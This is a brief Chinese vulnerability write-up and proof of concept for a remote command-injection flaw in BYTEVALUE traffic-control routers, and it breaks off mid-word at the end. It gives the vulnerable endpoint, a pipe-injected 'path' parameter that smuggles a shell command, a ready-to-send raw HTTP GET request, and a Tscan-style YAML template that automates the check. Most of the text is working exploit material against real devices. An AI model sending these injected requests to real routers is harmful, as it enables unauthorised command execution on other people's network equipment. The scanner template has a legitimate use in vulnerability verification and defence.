0x01漏洞描述
BYTEVALUE百为流控路由拥有强大的多线分流,多线叠加负载均衡功能,加上领先的智能流控QOS技术能解决网吧,小区等公共营业场所带宽不够的难题。该路由器存在远程命令执行漏洞。
0x02漏洞复现
(1)payload利用地址:
/goform/webRead/open/?path=|echo+12345
(2)命令执行POC:
GET /goform/webRead/open/?path=|echo+12345 HTTP/1.1
Host: 127.0.0.1
Accept: */*
Connection: Keep-Alive
0x03POC使用(Tscan验证)
params: []
name: BYTEVALUE 百为流控路由器远程命令漏洞
set:
a1: randomLowercase(8)
rules:
method: GET
path: /goform/webRead/open/?path=|echo+{
{a1}}
headers: {}
body: ""
search: ""
followredirects: false
expression: response.status == 200 && response.body.bcontains(bytes(string(a1)))
gro